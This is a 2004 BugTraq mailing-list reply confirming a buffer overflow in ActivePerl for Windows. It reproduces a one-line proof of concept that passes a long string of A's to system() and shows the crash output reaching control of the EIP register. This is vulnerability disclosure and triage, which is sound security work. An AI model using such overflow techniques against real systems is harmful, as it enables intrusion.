BugTraq
Buffer Overflow in ActivePerl ? May 17 2004 08:23PM
Oliver@greyhat.de (Oliver greyhat de) (3 replies)
Re: Buffer Overflow in ActivePerl ? May 18 2004 01:29PM
Nick FitzGerald (nick virus-l demon co uk)
"Oliver (at) greyhat (dot) de" <Oliver (at) greyhat (dot) de> wrote:

> I played around with ActiveState's ActivePerl for Win32, and crashed
> Perl.exe with the following command:
>
> perl -e "$a="A" x 256; system($a)"

Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus
all but last week's security patch:

perl -e "$a="A" x 256; system($a)"

perl.exe - Application error

Unhandled instruction at "0x77fcc83d" referenced memory at
"0x00657865. The memory could not be "written".

Also, it is likely exploitable -- push up the number of A's a bit:

C:\>perl -e "$a="A" x 259; system($a)"

perl.exe - Application error

Unhandled instruction at "0x77fcc83d" referenced memory at
"0x65004141. The memory could not be "written".

and we seem to get control of EIP. Coincidence? Try yet two more:

C:\>perl -e "$a="A" x 261; system($a)"

perl.exe - Application error

Unhandled instruction at "0x77fcc83d" referenced memory at
"0x41414141. The memory could not be "written".

Looks like full control of EIP...

However, there is not likely to be a privilege escalation here unless
perhaps a script processor on a web server can be cajoled into doing
something with this?? (Not at all familiar with the innards of Windows
web servers and their relationship to their CGI, etc. processors...)

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
